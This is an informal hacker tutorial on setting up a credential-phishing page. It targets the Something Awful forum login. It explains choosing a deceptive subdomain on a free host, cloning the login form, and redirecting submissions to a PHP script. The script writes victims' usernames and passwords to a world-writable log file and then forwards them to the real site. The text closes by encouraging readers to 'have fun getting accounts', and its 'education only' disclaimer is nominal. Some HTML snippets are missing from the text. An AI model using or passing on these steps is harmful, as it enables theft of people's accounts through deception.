Creating a Phishing Scheme

#######Creating a Phishing Scheme#######
~!~!~!~!~By Vozz ~!~!~!~!~

Disclamer
-------------------------------------
| The creator of this paper takes |
| no responcibility for anything |
| damaged by the information in |
| this paper. This is for education |
| only. |
| |
-------------------------------------

What you need: Basic knowledge of HTML and a little of PHP. Know how to chmod things.

---------------------
`````````````````````
Pre steup
Making the account
`````````````````````
---------------------

Find a free hosting account that has a subdomain and you have to make it convincing. Register an account at 741.com (if
you don't have your own site) and make the subdomain long and convincing. For this tutorial make it something like forum-
login-somethingawful-id-2937426376.741.com/index.html?LOGIN_ID=98217398127
Then create an account at freeownhost.com (they support PHP) and just make it whatever you want, the subdomain isn't important.


---------------------
`````````````````````
Step one
Creating the site
`````````````````````
---------------------

So you want to create a phishing scheme for some website eh? Get some accounts and cause trouble? Well first off
you're going to need a webhost and a convincing URL. For this tutorial, we are going to use the something awful forum.
Which has a very basic login scheme.
http://forums.somethingawful.com/member.php?action=loginform#form

Now first off, you have to create the template. View the source of the site and find out if they put http://theirsite
before all links or images. If they don't, you will have to do that. After you do that in your editor, find the code
that says this:

and




Now, those are the two most important things in this template. You are going to have to change the action in the form
to /somethingawful.php (which we will create later). After that you're done with creating the template. Go on to the next
step.

-------------------
``````````````````
Step two
Making the PHP file that logs the info
``````````````````
------------------

Now you're done with the site it self so you have to make the php file. The php file is the most important part of the phishing
scheme. Create a php file called somethingawful.php (remember you can name it whatever you want if you're doing a different
site) and a file called salog.txt. Leave them both blank for now.

In the php file the code is going to look like this:

$username = $_POST[username];
$password = $_POST[password];
$fl = fopen('salog.txt', 'a');
fwrite($fl, "$username . $password \n\n");
fclose($fl);
?>



What this script does is declares the username and password values from what the person entered using POST. It then opens
the salog.txt file on your server. Then it writes the $username and $password values into salog.txt and then enters two blank
lines. Then it closes the writing of the file and ends the php file. Then the javascript just redirects it to forums.somethingawful.com
which is the homepage for the forums.

Now, save that into somethingawful.php and upload it to your site. Upload salog.txt to your site too and chmod it to 777 (read, write, execute all).

Now test it and you should be done! You can do this for any site you want it really doesn't matter. Just have fun getting accounts.

###########################

Shoutouts to
Chrome- , Zimshady, Novalok, everyone at h4cky0u and the star syndicate and you for reading my tutorial. :D